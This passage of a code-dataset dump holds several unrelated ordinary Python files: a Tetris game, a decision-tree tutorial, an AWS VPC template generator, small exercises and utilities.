0.052,\n \"user_bandgap\": 1.54}\n GaAs_path = \"../../test_files/GaAs_mp-2534\"\n\n # the fort.123 file contains the coefficients of the interpolated band structure;\n # it is generated by a modified version of BoltzTraP\n coeff_file = os.path.join(GaAs_path, \"fort.123\")\n\n amset = Amset(calc_dir='.',\n vasprun_file=os.path.join(GaAs_path, \"vasprun.xml\"),\n material_params=GaAs_params,\n model_params = model_params,\n performance_params=performance_params,\n dopings= [-2e15, -2e18],\n temperatures=[300, 600],\n )\n\n # running Amset\n amset.run_profiled(coeff_file=coeff_file, kgrid_tp=\"coarse\")\n\n # generating files and outputs\n amset.write_input_files()\n amset.to_csv()\n amset.to_file()\n amset.to_json(kgrid=True, trimmed=True, max_ndata=50, n0=0)\n amset.plot(k_plots=['energy'], e_plots='all',\n carrier_types=amset.all_types, save_format=None)","sub_path":"examples/GaAs/GaAs.py","file_name":"GaAs.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"314750885","text":"#PLACE YOUR CODE HERE\nimport pandas\nfrom collections import defaultdict\nfac_lastname = defaultdict(list)\nfac_fullname = {}\nfaculty_df = pandas.read_csv('/Users/Manoj/Documents/metis/prework/faculty.csv',sep='\\s*,\\s*',engine='python')\n\nfor row in faculty_df.itertuples():\n fac_lastname[row.name.split()[-1]].append([row.degree,row.title,row.email])\n fac_fullname[(row.name.split()[0],row.name.split()[-1])] = [row.degree,row.title,row.email]\n\nfacl=sorted(fac_lastname.items())\nfacn=sorted(fac_fullname.items())\nprint (facl[:3],\"\\n\")\nprint (facn[:3],\"\\n\")\nfacn_r=sorted(fac_fullname.items(), key = lambda x: x[0][1])\nprint (facn_r[:3])\n\n\n\n\n","sub_path":"python/advanced_python_dict.py","file_name":"advanced_python_dict.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"633507419","text":"# -*- coding:utf-8 -*-\r\n'''\r\nCreated on 2018��10��11��\r\nThis program is used to convert color text to '' form and numbered\r\n@author: Jingyuan Liu\r\n'''\r\n\r\ncolorMap = []\r\nwith open('numSeqColorMap.txt', 'a') as fileWrite:\r\n with open('colorMap.txt', 'r') as filein:\r\n num = 0\r\n for line in filein:\r\n num += 1\r\n print(\"'\"+line.rstrip('\\n')+\"',\")\r\n colorMap.append(\"'\"+line.rstrip('\\n')+\"',\")\r\n fileWrite.write(\"'\"+line.rstrip('\\n')+\"',\")\r\n print(str(num))\r\n fileWrite.write('\\n'+str(num)+'\\n\\n')\r\n fileWrite.close()\r\n \r\nwith open('numSeqColorMap.txt', 'a') as fileWrite:\r\n numSeq = -1\r\n for i in range(39):\r\n for j in range(4):\r\n numSeq += 1\r\n print(str(numSeq+1)+'['+str(i)+']'+'['+str(j)+'] '+ colorMap[numSeq])\r\n fileWrite.write(str(numSeq+1)+'['+str(i)+']'+'['+str(j)+'] '+ colorMap[numSeq] +'\\n')\r\n fileWrite.write('\\n')\r\n fileWrite.close() \r\n\r\nwith open('numSeqColorMap.txt', 'a') as fileWrite:\r\n numS = -1\r\n for i in range(39):\r\n for j in range(4):\r\n numS += 1\r\n print('['+str(i)+']'+'['+str(j)+'] '+ colorMap[numS])\r\n fileWrite.write('['+str(i)+']'+'['+str(j)+'] '+ colorMap[numS])\r\n fileWrite.write('\\n')\r\n fileWrite.close() ","sub_path":"colorMapText.py","file_name":"colorMapText.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"281359910","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\n The classic Tetris developed using PyGame.\n Copyright (C) 2018 Recursos Python - recursospython.com.\n\"\"\"\nimport os\nimport pygame\nimport numpy as np\n\n#Importamos los modulos\nfrom excepciones.excepciones import *\nfrom colores.colores import *\nfrom bloques.bloques import BlocksGroup\nfrom juego.juego import *\n\nimage_play = pygame.image.load(os.path.join('imagenes', 'play.png'))\nimage_pause = pygame.image.load(os.path.join('imagenes', 'pause.png'))\nimage_retry = pygame.image.load(os.path.join('imagenes', 'retry.png'))\nimage_mute = pygame.image.load(os.path.join('imagenes', 'mute.png'))\nimage_volume = pygame.image.load(os.path.join('imagenes', 'volume.png'))\nimage_exit = pygame.image.load(os.path.join('imagenes', 'exit.png'))\n\nWINDOW_WIDTH, WINDOW_HEIGHT = 500, 601\nGRID_WIDTH, GRID_HEIGHT = 300, 600\nTILE_SIZE = 30\n \njuego = Juego(Window(WINDOW_WIDTH,WINDOW_HEIGHT),Grid(GRID_WIDTH,GRID_HEIGHT),TILE_SIZE)\n\ndef draw_centered_surface(screen, surface, y):\n screen.blit(surface, (400 - surface.get_width()/2, y))\n\n\n\ndef main():\n \n pygame.init()\n pygame.display.set_caption(\"Tetris con PyGame\")\n screen = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))\n run = True\n paused = False\n game_over = False\n volume = True\n # Create background.\n background = pygame.Surface(screen.get_size())\n bgcolor = negro\n background.fill(bgcolor)\n\n track = pygame.mixer.Channel(0)\n track.set_volume(0.25)\n misc_sound = pygame.mixer.Channel(1)\n main_track = pygame.mixer.Sound(os.path.join('sounds', 'musica.mp3'))\n drop_audio = pygame.mixer.Sound(os.path.join('sounds', 'drop.wav'))\n lose_track = pygame.mixer.Sound(os.path.join('sounds', 'lose.mp3'))\n track.play(main_track,-1)\n # Draw the grid on top of the background.\n juego.draw_grid(background)\n # This makes blitting faster.\n background = background.convert()\n\n try:\n font = pygame.font.Font(os.path.join('fuentes', '8-bit-blanco.ttf'), 24)\n font_score = pygame.font.Font(os.path.join('fuentes', '8-bit-blanco.ttf'), 32)\n except OSError:\n # If the font file is not available, the default will be used.\n pass\n next_block_text = font.render(\n \"Siguiente figura\", True, blanco, bgcolor)\n score_msg_text = font.render(\n \"Puntaje\", True, blanco, bgcolor)\n game_over_text = font.render(\n \"GAME OVER\", True, rojo, bgcolor)\n paused_text = font.render(\n \"Juego pausado\", True, amarillo, bgcolor)\n boton_play_pause = Boton((400 - image_play.get_width()/2)-50,360,image_play) \n boton_mute = Boton((400 - image_mute.get_width()/2)+50,365,image_mute) \n boton_retry = Boton((400 - image_retry.get_width()/2)-45,490,image_retry) \n boton_exit = Boton((400 - image_exit.get_width()/2)+45,500,image_exit) \n \n # Event constants.\n MOVEMENT_KEYS = pygame.K_LEFT, pygame.K_RIGHT, pygame.K_DOWN, pygame.K_SPACE\n EVENT_UPDATE_CURRENT_BLOCK = pygame.USEREVENT + 1\n EVENT_MOVE_CURRENT_BLOCK = pygame.USEREVENT + 2\n pygame.time.set_timer(EVENT_UPDATE_CURRENT_BLOCK, 1000)\n pygame.time.set_timer(EVENT_MOVE_CURRENT_BLOCK, 50)\n \n blocks = BlocksGroup(juego)\n \n while run:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n break\n elif event.type == pygame.KEYUP:\n if not paused and not game_over:\n if event.key in MOVEMENT_KEYS:\n blocks.stop_moving_current_block()\n elif event.key == pygame.K_UP:\n blocks.rotate_current_block()\n \n if event.key == pygame.K_p:\n if not game_over:\n paused = not paused\n if event.key == pygame.K_m:\n if volume and not game_over:\n track.pause()\n else:\n track.unpause() \n volume = not volume \n \n # Stop moving blocks if the game is over or paused.\n if game_over or paused:\n continue \n if event.type == pygame.KEYDOWN:\n if event.key in MOVEMENT_KEYS:\n blocks.start_moving_current_block(event.key)\n if event.key == pygame.K_SPACE:\n pygame.time.set_timer(EVENT_MOVE_CURRENT_BLOCK, 1) \n misc_sound.play(drop_audio,0)\n else: \n pygame.time.set_timer(EVENT_MOVE_CURRENT_BLOCK, 50) \n\n try:\n if event.type == EVENT_UPDATE_CURRENT_BLOCK:\n blocks.update_current_block()\n elif event.type == EVENT_MOVE_CURRENT_BLOCK:\n blocks.move_current_block()\n except TopReached:\n game_over = True\n if volume:\n track.play(lose_track,-1)\n \n # Draw background and grid.\n screen.blit(background, (0, 0))\n # Blocks.\n blocks.draw(screen)\n # Sidebar with misc. information.\n draw_centered_surface(screen, next_block_text, 50)\n draw_centered_surface(screen, blocks.next_block.image, 100)\n draw_centered_surface(screen, score_msg_text, 240)\n score_text = font_score.render(\n str(blocks.score), True, blanco, bgcolor)\n draw_centered_surface(screen, score_text, 270)\n if boton_exit.draw(screen): \n break\n if volume:\n boton_mute.image = image_volume\n if boton_mute.draw(screen) and not game_over:\n volume = False\n track.pause()\n else:\n boton_mute.image = image_mute\n if boton_mute.draw(screen) and not game_over:\n volume = True\n track.unpause()\n\n if paused:\n draw_centered_surface(screen, paused_text, 330)\n boton_play_pause.image = image_play\n if boton_play_pause.draw(screen) and not game_over:\n paused = not paused\n else: \n boton_play_pause.image = image_pause\n if boton_play_pause.draw(screen) and not game_over:\n paused = not paused\n\n if game_over:\n draw_centered_surface(screen, game_over_text, 450)\n if boton_retry.draw(screen):\n main()\n break\n # Update.\n pygame.display.flip()\n \n pygame.quit()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"tetris.py","file_name":"tetris.py","file_ext":"py","file_size_in_byte":6612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"318211818","text":"from math import sqrt\n\nprimes = []\nfor num in range(1,100000000):\n end = int(sqrt(num))\n is_prime = True\n for x in range(2, end+1):\n if num % x == 0:\n is_prime = False\n break\n if is_prime and num != 1:\n primes.append(num)\nprint(primes)","sub_path":"exercise_30.py","file_name":"exercise_30.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"349672672","text":"\"\"\":parameter\nResource: StatQuest\nLink: https://www.youtube.com/watch?v=q90UDEgYqeI\npredict: 'hd'\n\"\"\"\nimport pandas as pd # to load and manipulate data and for one-hot encoding\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sklearn\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.tree import plot_tree\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import plot_confusion_matrix\nP_COUNT_F = 'num_pf'\nP_COUNT_B = 'num_pb'\n\ndef dt_clf():\n\tdf = pd.read_csv(r'C:\\Users\\Owner\\DataScience\\MachineLearning\\resources\\DataSets\\processed.cleveland.csv')\n\t\"\"\":parameter\n\tdf columns\n\t['age', 'sex', 'cp', 'restbp', 'chol', 'fbs', 'restecg', 'thalach', 'exang', 'oldpeak', 'slope', 'ca', 'thal', 'hd']\n\t\n\t\"\"\"\n\tprint(\"df data types\\n==================== \\n {}\".format(df.dtypes))\n\tprint(df.columns)\n\t\"\"\":parameter\n\t'thal' and 'ca' are object datatypes, and contain missing values. \n\t\"\"\"\n\t# check for missing values\n\tprint(df['ca'].unique())\n\tprint(df['thal'].unique())\n\n\t# Check how many rows contains missing values\n\tprint(\"missing values \\n===============\\n {}\".format(len(df.loc[(df['ca']=='?') | (df['thal']=='?')])))\n\n\t# remove missing values form the dataset\n\tdf_no_missing = df.loc[(df['ca'] != '?') & (df['thal'] != '?')]\n\n\t\"\"\":parameter\n\tFormat Data Part 1: Split the data into Dependent and independent variables \n\t\"\"\"\n\tX = df_no_missing.drop('hd', axis=1).copy()\n\ty = df_no_missing['hd'].copy()\n\n\n\t\"\"\":parameter\n\tWe see that age, restbp, chol, and thalach are all flaot64, which is good, because we want them to be floationg point. \n\tSciokit-learn natively do not support categorical data., like cp contains 4 different categories. So we have use One-hot \n\tencoding to convert a column of catagorical data into multiple columns of binary values. \n\t\"\"\"\n\tX_encoded = pd.get_dummies(X, columns=['cp', 'restecg', 'slope', 'thal'])\n\n\ty_not_zero_index = y > 0\n\ty[y_not_zero_index] = 1\n\n\t\"\"\":parameter\n\tbuild A preliminary classification tree\n\t\"\"\"\n\t# split the data into training and testing sets\n\tX_train, X_test, y_train, y_test = train_test_split(X_encoded, y, random_state=42)\n\n\t# create a decision tree and fit it to the training data\n\tclf_dt = DecisionTreeClassifier(random_state=42)\n\tclf_dt = clf_dt.fit(X_train, y_train)\n\n\t#plot the tree\n\tplt.figure(figsize=(15, 7.5))\n\tplot_tree(clf_dt, filled=True, rounded=True, class_names=['No HD', 'Yes HD'], feature_names=X_encoded.columns);\n\t# plt.show()\n\n\t# plot confusion matrix\n\t# plot_confusion_matrix(clf_dt, X_test, y_test)\n\n\t\"\"\"\":parameter\n\tCost Complexity Pruning Part 1: Visualize alpha\n\t\"\"\"\n\tpath = clf_dt.cost_complexity_pruning_path(X_train, y_train) # determine the value for alpha\n\tccp_alphas = path.ccp_alphas\n\tccp_alphas = ccp_alphas[:-1]\n\t# print(ccp_alphas)\n\n\tclf_dts = []\n\n\tfor ccs_alpha in ccp_alphas:\n\t\tclf_dt = DecisionTreeClassifier(random_state=0, ccp_alpha=ccs_alpha)\n\t\tclf_dt.fit(X_train, y_train)\n\t\tclf_dts.append(clf_dt)\n\n\ttrain_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]\n\ttest_Scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]\n\n\tfig, ax = plt.subplots()\n\tax.set_xlabel(\"alpha\")\n\tax.set_ylabel(\"accuracy\")\n\tax.set_title(\"Accuracy vs alpha for training and testing sets\")\n\tax.plot(ccp_alphas, train_scores, marker='o', label=\"train\", drawstyle=\"steps-post\")\n\tax.plot(ccp_alphas, test_Scores, marker='o', label=\"test\", drawstyle=\"steps-post\")\n\tax.legend()\n\t# plt.show()\n\n\t\"\"\"\n\tCost Complexity pruning Part 2: Cross Validation for finding the Best Alpha\n\t\"\"\"\n\tclf_dt = DecisionTreeClassifier(random_state=42, ccp_alpha=0.016, )\n\tscores = cross_val_score(clf_dt, X_train, y_train, cv=5)\n\tdf = pd.DataFrame(data={'tree': range(5), 'accuracy': scores})\n\tdf.plot(x='tree', y='accuracy', marker='o', linestyle='--')\n\t# plt.show()\n\n\talpha_loop_values = []\n\tfor ccp_alpha in ccp_alphas:\n\t\tclf_dt = DecisionTreeClassifier(random_state=0, ccp_alpha=ccp_alpha)\n\t\tscores = cross_val_score(clf_dt, X_train, y_train, cv=5)\n\t\talpha_loop_values.append([ccp_alpha, np.mean(scores), np.std(scores)])\n\t# print(alpha_loop_values)\n\n\talpha_results = pd.DataFrame(alpha_loop_values, columns=['alpha', 'mean_accuracy', 'std'])\n\n\talpha_results.plot(x='alpha', y='mean_accuracy', yerr='std', marker='o', linestyle='--')\n\t# plt.show()\n\n\tideal_ccp_alpha = alpha_results[(alpha_results['alpha'] > 0.014) & (alpha_results['alpha'] < 0.015) ]['alpha']\n\tprint(ideal_ccp_alpha)\n\n\t# convert ideal_alpha from a series to a float\n\tideal_ccp_alpha = float(ideal_ccp_alpha)\n\tprint(ideal_ccp_alpha)\n\n\t\"\"\":parameter\n\tBuilding, Evaluating, Drawing, and Interpreting the Final Classification Tree\n\t\"\"\"\n\tclf_dt_pruned = DecisionTreeClassifier(random_state=42, ccp_alpha= ideal_ccp_alpha)\n\tclf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)\n\tdisp = plot_confusion_matrix(clf_dt_pruned, X_test, y_test, display_labels=['Does not have HD', \"Has HD\"])\n\tdisp.ax_.set_title(\"Pruned Confuaion matrix\")\n\tprint(disp.confusion_matrix)\n\n\n\t# Draw pruned tree\n\tplt.figure(figsize=(15, 7.5))\n\tplot_tree(clf_dt_pruned, filled=True, rounded=True, class_names=['No HD', 'Yes HD'], feature_names=X_encoded.columns)\n\tplt.show()\n\nif __name__ == \"__main__\":\n\tdt_clf()","sub_path":"ml-algorithms/classification/decisionTreeClassifier.py","file_name":"decisionTreeClassifier.py","file_ext":"py","file_size_in_byte":5249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"177685466","text":"class stack:\n\n def __init__(self):\n self.stack = []\n\n def add(self,dataval):\n #use list append method to add element\n if dataval not in self.stack:\n self.stack.append(dataval)\n return True\n else:\n return False\n \n #use peek to look at the top of the stack\n def peek(self):\n if len(self.stack) == 0:\n print(\"nothing there\")\n return False\n else:\n return self.stack[-1]\n\n def remove(self):\n if len(self.stack) <= 0:\n return (\"No element in the stack\")\n else:\n return self.stack.pop()\n\nwhile (1):\n print(\"choose one of the following: \\n 1 : pushing in stack \\n 2 : peeking in stack \\n 3 : poping from stack\")\n a = int(input())\n Astack = stack()\n if( a == 1):\n b = input()\n Astack.add(b)\n elif ( a == 2):\n Astack.peek()\n elif ( a == 3):\n Astack.remove()\n else:\n print(\"invalid input you stupid! \\n\")\n \n","sub_path":"stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"258531847","text":"import sys\nimport troposphere\nfrom troposphere import Parameter, Output\nfrom troposphere import Ref, GetAtt\nimport troposphere.ec2 as ec2\nimport click\n\n\nsys.path.append('..')\nimport helpers\n\nconfig = helpers.read_config()\n\n\n@click.group()\ndef cli():\n pass\n\n\n@cli.command()\n@click.option('--stack_name', help='Name of stack to operate on')\ndef generate_template(stack_name):\n\n region = config['aws_region']\n\n template = troposphere.Template()\n\n ##########################################################################################################\n # Parameters\n ##########################################################################################################\n\n template.add_parameter(\n Parameter(\n title='VpcCidrBlock',\n Type='String',\n Default=config['default_vpc_cidr'],\n AllowedPattern=\"^(\\\\d{1,3})\\\\.(\\\\d{1,3})\\\\.(\\\\d{1,3})\\\\.(\\d{1,3})\\\\/(\\\\d{1,2})\",\n Description='VPC CIDR (X.X.0.0/16)',\n ConstraintDescription=\"Must be a valid CIDR block\"\n )\n )\n\n template.add_parameter(\n Parameter(\n title='PublicACidrBlock',\n Type='String',\n Default=config['default_public_a_cidr'],\n AllowedPattern=\"^(\\\\d{1,3})\\\\.(\\\\d{1,3})\\\\.(\\\\d{1,3})\\\\.(\\d{1,3})\\\\/(\\\\d{1,2})\",\n Description='CIDR block for public subnet in AZ A (X.X.X.0/16)',\n ConstraintDescription=\"Must be a valid CIDR block\"\n )\n )\n\n template.add_parameter(\n Parameter(\n title='PublicBCidrBlock',\n Type='String',\n Default=config['default_public_b_cidr'],\n AllowedPattern=\"^(\\\\d{1,3})\\\\.(\\\\d{1,3})\\\\.(\\\\d{1,3})\\\\.(\\d{1,3})\\\\/(\\\\d{1,2})\",\n Description='CIDR block for public subnet in AZ B (X.X.X.0/16)',\n ConstraintDescription=\"Must be a valid CIDR block\"\n )\n )\n\n template.add_parameter(\n Parameter(\n title='PrivateACidrBlock',\n Type='String',\n Default=config['default_private_a_cidr'],\n AllowedPattern=\"^(\\\\d{1,3})\\\\.(\\\\d{1,3})\\\\.(\\\\d{1,3})\\\\.(\\d{1,3})\\\\/(\\\\d{1,2})\",\n Description='CIDR block for private subnet in AZ A (X.X.X.0/16)',\n ConstraintDescription=\"Must be a valid CIDR block\"\n )\n )\n\n template.add_parameter(\n Parameter(\n title='PrivateBCidrBlock',\n Type='String',\n Default=config['default_private_b_cidr'],\n AllowedPattern=\"^(\\\\d{1,3})\\\\.(\\\\d{1,3})\\\\.(\\\\d{1,3})\\\\.(\\d{1,3})\\\\/(\\\\d{1,2})\",\n Description='CIDR block for private subnet in AZ B (X.X.X.0/16)',\n ConstraintDescription=\"Must be a valid CIDR block\"\n )\n )\n\n template.add_parameter(\n Parameter(\n title='Owner',\n Type='String',\n MinLength=3,\n MaxLength=40,\n Description=\"Owner of VPC - put your name here\",\n ConstraintDescription=\"Must be between 3 and 40 alphanumeric characters\",\n )\n )\n\n template.add_metadata(\n {\n 'AWS::CloudFormation::Interface': {\n 'ParameterGroups': [\n {\n \"Label\": {\"default\": \"Identifier Configuration\"},\n \"Parameters\": [\"Owner\"]\n },\n {\n \"Label\": {\"default\": \"Network Configuration\"},\n \"Parameters\": [\"VpcCidrBlock\", \"PrivateACidrBlock\", \"PrivateBCidrBlock\",\n \"PublicACidrBlock\", \"PublicBCidrBlock\"],\n },\n ]\n }\n }\n )\n\n ##########################################################################################################\n # VPC and Subnets\n ##########################################################################################################\n\n template.add_resource(\n ec2.VPC(\n title='LabVPC',\n CidrBlock=Ref('VpcCidrBlock'),\n EnableDnsSupport=True,\n EnableDnsHostnames=True,\n Tags=[\n {\n 'Key': 'Name',\n 'Value': stack_name,\n },\n {\n 'Key': 'Environment',\n 'Value': 'Lab',\n },\n {\n 'Key': 'Owner',\n 'Value': Ref('Owner'),\n }\n ],\n )\n )\n\n template.add_resource(\n ec2.Subnet(\n title='PublicSubnetA',\n VpcId=Ref('LabVPC'),\n AvailabilityZone=\"{0}a\".format(region),\n CidrBlock=Ref('PublicACidrBlock'),\n MapPublicIpOnLaunch=True,\n Tags=[\n {\n 'Key': 'Name',\n 'Value': \"{0}.pub.a\".format(stack_name)\n },\n {\n 'Key': 'Environment',\n 'Value': 'Lab',\n },\n {\n 'Key': 'Owner',\n 'Value': Ref('Owner'),\n }\n ],\n )\n )\n\n template.add_resource(\n ec2.Subnet(\n title='PublicSubnetB',\n VpcId=Ref('LabVPC'),\n AvailabilityZone=\"{0}b\".format(region),\n CidrBlock=Ref('PublicBCidrBlock'),\n MapPublicIpOnLaunch=True,\n Tags=[\n {\n 'Key': 'Name',\n 'Value': \"{0}.pub.b\".format(stack_name)\n },\n {\n 'Key': 'Environment',\n 'Value': 'Lab',\n },\n {\n 'Key': 'Owner',\n 'Value': Ref('Owner'),\n }\n ],\n )\n )\n\n template.add_resource(\n ec2.Subnet(\n title='PrivateSubnetA',\n VpcId=Ref('LabVPC'),\n AvailabilityZone=\"{0}a\".format(region),\n CidrBlock=Ref('PrivateACidrBlock'),\n MapPublicIpOnLaunch=False,\n Tags=[\n {\n 'Key': 'Name',\n 'Value': \"{0}.prv.a\".format(stack_name)\n },\n {\n 'Key': 'Environment',\n 'Value': 'Lab',\n },\n {\n 'Key': 'Owner',\n 'Value': Ref('Owner'),\n }\n ],\n )\n )\n\n template.add_resource(\n ec2.Subnet(\n title='PrivateSubnetB',\n VpcId=Ref('LabVPC'),\n AvailabilityZone=\"{0}b\".format(region),\n CidrBlock=Ref('PrivateBCidrBlock'),\n MapPublicIpOnLaunch=False,\n Tags=[\n {\n 'Key': 'Name',\n 'Value': \"{0}.prv.b\".format(stack_name)\n },\n {\n 'Key': 'Environment',\n 'Value': 'Lab',\n },\n {\n 'Key': 'Owner',\n 'Value': Ref('Owner'),\n }\n ],\n )\n )\n\n ##########################################################################################################\n # Internet gateway and NAT Gateways\n ##########################################################################################################\n\n template.add_resource(\n ec2.InternetGateway(\n title=\"LabVPCGateway\",\n Tags=[\n {\n 'Key': 'Name',\n 'Value': \"{0}.igw\".format(stack_name)\n },\n {\n 'Key': 'Environment',\n 'Value': 'Lab',\n },\n {\n 'Key': 'Owner',\n 'Value': Ref('Owner'),\n }\n ],\n )\n )\n\n template.add_resource(\n ec2.VPCGatewayAttachment(\n title=\"LabVPCGatewayAttachment\",\n InternetGatewayId=Ref('LabVPCGateway'),\n VpcId=Ref('LabVPC')\n )\n )\n\n # --- NAT Gateways\n\n template.add_resource(\n ec2.EIP(\n title=\"EipNatGatewayPublicSubnetA\",\n Domain='vpc'\n )\n )\n\n template.add_resource(\n ec2.EIP(\n title=\"EipNatGatewayPublicSubnetB\",\n Domain='vpc'\n )\n )\n\n template.add_resource(\n ec2.NatGateway(\n title=\"NatGatewayPublicSubnetA\",\n AllocationId=GetAtt('EipNatGatewayPublicSubnetA', 'AllocationId'),\n SubnetId=Ref('PublicSubnetA'),\n )\n )\n\n template.add_resource(\n ec2.NatGateway(\n title=\"NatGatewayPublicSubnetB\",\n AllocationId=GetAtt('EipNatGatewayPublicSubnetB', 'AllocationId'),\n SubnetId=Ref('PublicSubnetB'),\n )\n )\n\n ##########################################################################################################\n # Network Routing\n ##########################################################################################################\n\n # -- public route\n\n template.add_resource(\n ec2.RouteTable(\n title=\"PublicRouteTable\",\n VpcId=Ref('LabVPC'),\n Tags=[\n {\n 'Key': 'Name',\n 'Value': \"{0}.rtable.pub\".format(stack_name)\n },\n {\n 'Key': 'Environment',\n 'Value': 'Lab',\n },\n {\n 'Key': 'Owner',\n 'Value': Ref('Owner'),\n }\n ],\n )\n )\n\n template.add_resource(\n ec2.Route(\n title=\"PublicDefaultRoute\",\n RouteTableId=Ref('PublicRouteTable'),\n GatewayId=Ref('LabVPCGateway'),\n DestinationCidrBlock=('0.0.0.0/0'),\n )\n )\n\n template.add_resource(\n ec2.SubnetRouteTableAssociation(\n title=\"PublicRouteTableAssociationSubnetA\",\n RouteTableId=Ref('PublicRouteTable'),\n SubnetId=Ref('PublicSubnetA'),\n )\n )\n\n template.add_resource(\n ec2.SubnetRouteTableAssociation(\n title=\"PublicRouteTableAssociationSubnetB\",\n RouteTableId=Ref('PublicRouteTable'),\n SubnetId=Ref('PublicSubnetB'),\n )\n )\n\n # Private route - private subnet a\n\n template.add_resource(\n ec2.RouteTable(\n title=\"PrivateRouteTableSubnetA\",\n VpcId=Ref('LabVPC'),\n Tags=[\n {\n 'Key': 'Name',\n 'Value': \"{0}.rtable.prv.a\".format(stack_name)\n },\n {\n 'Key': 'Environment',\n 'Value': 'Lab',\n },\n {\n 'Key': 'Owner',\n 'Value': Ref('Owner'),\n }\n ],\n )\n )\n\n template.add_resource(\n ec2.Route(\n title=\"DefaultRoutePrivateSubnetA\",\n RouteTableId=Ref('PrivateRouteTableSubnetA'),\n NatGatewayId=Ref('NatGatewayPublicSubnetA'),\n DestinationCidrBlock=('0.0.0.0/0'),\n )\n )\n\n template.add_resource(\n ec2.SubnetRouteTableAssociation(\n title=\"PrivateRouteTableAssociationSubnetA\",\n RouteTableId=Ref('PrivateRouteTableSubnetA'),\n SubnetId=Ref('PrivateSubnetA'),\n )\n )\n\n # Private route - private subnet b\n\n template.add_resource(\n ec2.RouteTable(\n title=\"PrivateRouteTableSubnetB\",\n VpcId=Ref('LabVPC'),\n Tags=[\n {\n 'Key': 'Name',\n 'Value': \"{0}.rtable.prv.b\".format(stack_name)\n },\n {\n 'Key': 'Environment',\n 'Value': 'Lab',\n },\n {\n 'Key': 'Owner',\n 'Value': Ref('Owner'),\n }\n ],\n )\n )\n\n template.add_resource(\n ec2.Route(\n title=\"DefaultRoutePrivateSubnetB\",\n RouteTableId=Ref('PrivateRouteTableSubnetB'),\n NatGatewayId=Ref('NatGatewayPublicSubnetB'),\n DestinationCidrBlock=('0.0.0.0/0'),\n )\n )\n\n template.add_resource(\n ec2.SubnetRouteTableAssociation(\n title=\"PublicDefaultRouteSubnetB\",\n RouteTableId=Ref('PrivateRouteTableSubnetB'),\n SubnetId=Ref('PrivateSubnetB'),\n )\n )\n\n ##########################################################################################################\n # Outputs\n ##########################################################################################################\n\n template.add_output(\n [\n Output(\n \"NatGatewayA\",\n Description=\"Public IP For NAT Gateway A\",\n Value=Ref('EipNatGatewayPublicSubnetA')\n ),\n Output(\n \"NatGatewayB\",\n Description=\"Public IP For NAT Gateway B\",\n Value=Ref('EipNatGatewayPublicSubnetB')\n )\n ]\n )\n\n print(template.to_json())\n\nif __name__ == '__main__':\n generate_template()\n","sub_path":"lab03/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":13368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"48939305","text":"import numpy as np\n\nfrom semseg.datasets.seg_label import SegLabel\n\n\nclass RemapLabel:\n def __init__(self, label, unknown_id=0):\n self.label_map = label\n self.unkown_id = unknown_id\n\n def __call__(self, lbl):\n # remap_lbl = lbl[np.where(np.isin(lbl, cls.label_map.support_id_list), lbl, 0)]\n color_lbl = np.full_like(lbl, self.unkown_id)\n for label in self.label_map:\n label: SegLabel\n color_lbl[lbl == label.orig_ID] = label.to_ID\n return color_lbl\n","sub_path":"semseg/datasets/transforms/remap_label.py","file_name":"remap_label.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"535257375","text":"\"\"\"Data Structures and Algorithms in Python - Goodrich, M. et al., page 53\"\"\"\n\n# C-1.23 Give an example of a Python code fragment that attempts to write an element\n# to a list based on an index that may be out of bounds. If that index\n# is out of bounds, the program should catch the exception that results, and\n# print the following error message:\n# “Don’t try buffer overflow attacks in Python!”\n\ndef list_out_of_bounds(a_list, element, index):\n \"\"\"Attempts to write element at index position within the list.\"\"\"\n try:\n a_list[index] = element\n except:\n raise Exception('Don’t try buffer overflow attacks in Python!')\n\n# C-1.24 Write a short Python function that counts the number of vowels in a given\n# character string.\n\ndef count_vowels(string):\n \"\"\"Counts the number of vowels in a string.\"\"\"\n # vowels = ['A', 'a', 'E', 'e', 'I', 'i', 'O', 'o', 'U', 'u', 'Y', 'y']\n vowels = 'aeiouy'\n counter = 0\n for character in string:\n if character.lower() in vowels:\n counter += 1\n return counter\n\n# C-1.25 Write a short Python function that takes a string s, representing a sentence,\n# and returns a copy of the string with all punctuation removed. For example,\n# if given the string \"Let s try, Mike.\", this function would return\n# \"Lets try Mike\".\n\ndef remove_punctuation(sentence):\n \"\"\"Removes all punctuation from a sentence string.\"\"\"\n result = ''\n punctuation = [\"'\", '\"', ':', ';', '.', ',', '!', '?', '-']\n for letter in sentence:\n if letter not in punctuation:\n result += letter\n return result\n\n# C-1.27 In Section 1.8, we provided three different implementations of a generator\n# that computes factors of a given integer. The third of those implementations,\n# from page 41, was the most efficient, but we noted that it did not\n# yield the factors in increasing order. Modify the generator so that it reports\n# factors in increasing order, while maintaining its general performance advantages.\n\ndef factors(num):\n 